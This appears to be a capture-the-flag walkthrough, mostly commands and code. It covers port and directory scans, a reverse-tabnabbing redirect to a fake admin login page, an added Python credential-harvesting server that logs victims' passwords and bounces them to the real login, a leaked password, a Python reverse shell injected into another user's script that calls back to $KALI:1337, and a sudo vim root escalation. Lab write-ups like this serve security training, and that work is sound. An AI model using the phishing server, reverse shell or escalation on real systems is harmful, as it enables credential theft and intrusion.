nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
echo "hi" > test.html
python2 -m SimpleHTTPServer 82
<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://$KALI:8000/redir.html";
</script>
</body>
</html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<style>
body{ font: 14px sans-serif; }
.wrapper{ width: 360px; padding: 20px; }
</style>
</head>
<body>
<div class="wrapper">
<h2>Admin Login</h2>
<p>Please fill in your credentials to login.</p>
<form action="/admin/login.php" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<br>
</form>
</div>
</body>
</html>
python2 -m SimpleHTTPServer 82
python2 -m SimpleHTTPServer 8000
tcp.port==8000 && ip.dst == $VICTIM
ssh daniel@$VICTIM
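The redirect above only works because the target page opens the submitted link with window.opener still set (no rel="noopener"), so the script in redir.html can swap the original tab for the fake login page. The form on that page posts to /admin/login.php, which SimpleHTTPServer answers with a 501, which is why the credentials have to be picked out of a packet capture. The following is an added example, not part of the original writeup: a small Python 3 replacement for the SimpleHTTPServer on port 8000 that still serves redir.html and the fake page from the current directory, logs the username and password from any POST, and then sends the browser on to the real login page with a 303 so the failed attempt looks like a mistyped password. The form field names are taken from the fake page above; REAL_LOGIN and the module layout are assumptions for this example.

```python
#!/usr/bin/env python3
"""Credential-harvesting HTTP server for the fake admin login page.

Added example (not from the original writeup). Serves static files from
the current directory like SimpleHTTPServer, but also records the body of
any POST (the fake form posts to /admin/login.php) and then redirects the
browser to the real login page.
Assumptions: form fields are 'username' and 'password' (as in the fake
page); REAL_LOGIN must be set to the target's genuine login URL.
"""
import sys
import threading
import http.client
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

REAL_LOGIN = "http://VICTIM/admin/login.php"   # assumed; point at the real target
CAPTURED = []                                    # (client_ip, username, password)


def parse_credentials(body: bytes) -> dict:
    """Parse an application/x-www-form-urlencoded login body into a dict.
    Missing fields come back as ''; only the first value of each is kept."""
    fields = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    return {
        "username": fields.get("username", [""])[0],
        "password": fields.get("password", [""])[0],
    }


class HarvestHandler(SimpleHTTPRequestHandler):
    """GET behaves like SimpleHTTPServer (serves redir.html, the fake page);
    POST records the submitted credentials and bounces to REAL_LOGIN."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        creds = parse_credentials(self.rfile.read(length))
        CAPTURED.append((self.client_address[0], creds["username"], creds["password"]))
        print(f"[+] {self.client_address[0]} POST {self.path} "
              f"user={creds['username']!r} pass={creds['password']!r}", file=sys.stderr)
        # 303: the browser follows with a GET, landing on the real login page
        self.send_response(303)
        self.send_header("Location", REAL_LOGIN)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        # Keep the usual request log, but on stderr so it does not mix with captures
        sys.stderr.write("%s - %s\n" % (self.client_address[0], fmt % args))


def capture_roundtrip(body: bytes) -> tuple:
    """Offline check: start the server on an ephemeral loopback port, POST
    body to /admin/login.php the way the fake form does, and return
    (status, location header, last captured tuple)."""
    httpd = ThreadingHTTPServer(("127.0.0.1", 0), HarvestHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", httpd.server_address[1], timeout=5)
        conn.request("POST", "/admin/login.php", body,
                     {"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Location"), CAPTURED[-1]
    finally:
        httpd.shutdown()
        httpd.server_close()


def serve(port: int = 8000):
    """Run in the directory holding redir.html and the fake login page."""
    with ThreadingHTTPServer(("0.0.0.0", port), HarvestHandler) as httpd:
        print(f"[*] harvesting on :{port}, redirecting victims to {REAL_LOGIN}", file=sys.stderr)
        httpd.serve_forever()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 8000)
```

Run it from the directory containing redir.html and the fake page in place of `python2 -m SimpleHTTPServer 8000`; the Wireshark filter is then unnecessary, since each submission is printed to stderr and kept in CAPTURED.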
Password: C@ughtm3napping123
There is another user on this box. In their home directory there is a Python script that looks like it checks the website. I added the following to the code to get a reverse shell.
import os,pty,socket;s=socket.socket();s.connect(("$KALI",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
sudo vim -c ':!/bin/sh'
id